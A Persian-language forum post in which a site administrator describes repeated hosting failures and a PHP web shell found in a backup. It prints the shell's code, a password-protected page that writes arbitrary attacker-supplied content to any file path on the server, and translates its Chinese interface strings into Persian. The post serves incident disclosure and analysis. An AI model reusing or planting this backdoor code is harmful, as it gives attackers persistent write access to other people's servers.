تروجان وب شل و حمله سایبری به سایت ما

مدیر انجمن: parse

ارسال پست
نمایه کاربر
MRT

نام: محمدرضا طباطبایی

محل اقامت: تبریز

عضویت : پنج‌شنبه ۱۳۸۶/۴/۲۱ - ۱۸:۱۷


پست: 2422

سپاس: 95

جنسیت:

تماس:

تروجان وب شل و حمله سایبری به سایت ما

پست توسط MRT »

چند ماه پیش ftp هاست ما روی شرکت بهسازان هاست از کار افتاد و نتوانستند که کاری بکنند. مجبور به انتقال هاست شدیم. مشکل دو بار مجدداً تکرار شد. از فایل پشتیبان هاست اسکن گرفتیم و وب شل شناسایی شد.

تصویر


چند خط از اسکریپت تروجان وب شل پی اچ پی چینی:

کد: انتخاب همه

<html>

<head>

<title>&#24403;&#21069;IP <?=$_SERVER['SERVER_NAME']?></title>

</head>

<style>

body{font-family:Georgia;}

#neirong{width:558px;height:250px;border=#0000 1px solid}

#lujing{font-family:Georgia;width:389px;border=#0000 1px solid}

#shc{font-family:Georgia;background:#fff;width:63px;height:20px;border=#0000 1px solid}

</style>

<body bgcolor="black">

<?php

$password="adminuser";/**&#36825;&#37324;&#20462;&#25913;&#23494;&#30721;**/

if ($_GET[pass]==$password){

  if ($_POST)

{

  $fo=fopen($_POST["lujing"],"w");

  if(fwrite($fo,$_POST["neirong"]))

   echo "<font color=red><b>&#25104;&#21151;&#20889;&#20837;&#25991;&#20214;!</b></font>";

  else

   echo "<font color=#33CCFF><b>&#20889;&#20837;&#25991;&#20214;&#22833;&#36133;</b></font>";

 

}

else{

echo "<font color=#CCFFFF>&#20912;&#28304;&#29420;&#31435;&#32534;&#35793;php&#24102;&#23494;&#30721;&#23567;&#39532;</font>";

}

?><br><br>

<font color="#FFFF33">&#26381;&#21153;&#22120;IP&#21450;&#24403;&#21069;&#22495;&#21517;&#65306;<?=$_SERVER['SERVER_NAME']?>(<?=@gethostbyname($_SERVER['SERVER_NAME'])?>)<br>

&#24403;&#21069;&#39029;&#38754;&#30340;&#32477;&#23545;&#36335;&#24452;:<?php echo $_SERVER["SCRIPT_FILENAME"]?>

<form action="" method="post">

&#36755;&#20837;&#25991;&#20214;&#36335;&#24452;:<input type="text" name="lujing" id="lujing" value='<?php echo $_SERVER["SCRIPT_FILENAME"]?>' />

<input type="submit" id="shc" value="&#20889;&#20837;&#25968;&#25454;" /><br />

<textarea name="neirong" id="neirong">

</textarea>

</form></font>

<?php

 }else{

?>

<form action="" method="GET">

<font color="#00FFCC">&#36755;&#20837;&#23494;&#30721;:<input type="password" name="pass" id="pass">

 

 

<input type="submit" name="denglu" value="&#24320;&#38376;" /></form>

<?php } ?>

--(UploadBoundary)

Content-Disposition: form-data; name="yiw_action"

 

sendemail

--(UploadBoundary)

Content-Disposition: form-data; name="id_form

فراخوانی تروجان روی سرور آپاچی:

تصویر




写入文件失败

نوشتن فایل انجام نشد

---------------------

冰源独立编译php带密码小马

Bingyuan به طور مستقل php را با رمز عبور پونی کامپایل می کند

---------------------

服务器IP及当前域名

IP سرور و نام دامنه فعلی

---------------------

当前页面的绝对路径

مسیر مطلق صفحه فعلی

---------------------

输入文件路径

مسیر فایل ورودی

---------------------

输入密码

رمز عبور را وارد کنید

---------------------

开门

در را باز کن

---------------------

写入数据

ورود اطلاعات

---------------------

这里修改密码

رمز عبور را در اینجا تغییر دهید

---------------------

成功写入文件

فایل با موفقیت نوشته شد



کاملاً مشخص و معلوم است که هدف وب شل آپلود فایل روی سرور است.

علاقه داشتید کل اسکریپت را ارسال کنم تا تجزیه و تحلیلش کنید
با توجه به ماده 8 قوانین تالار گفتمان شبكه فیزیك هوپا :

ارايه انديشه‌هاي نو در فيزيك و متافيزيك ، رياضيات مختص فيزيك ، حساب و هندسه دوجيني در وب سايت شخصي :

https://ki2100.com

تصویر

تصویر

ارسال پست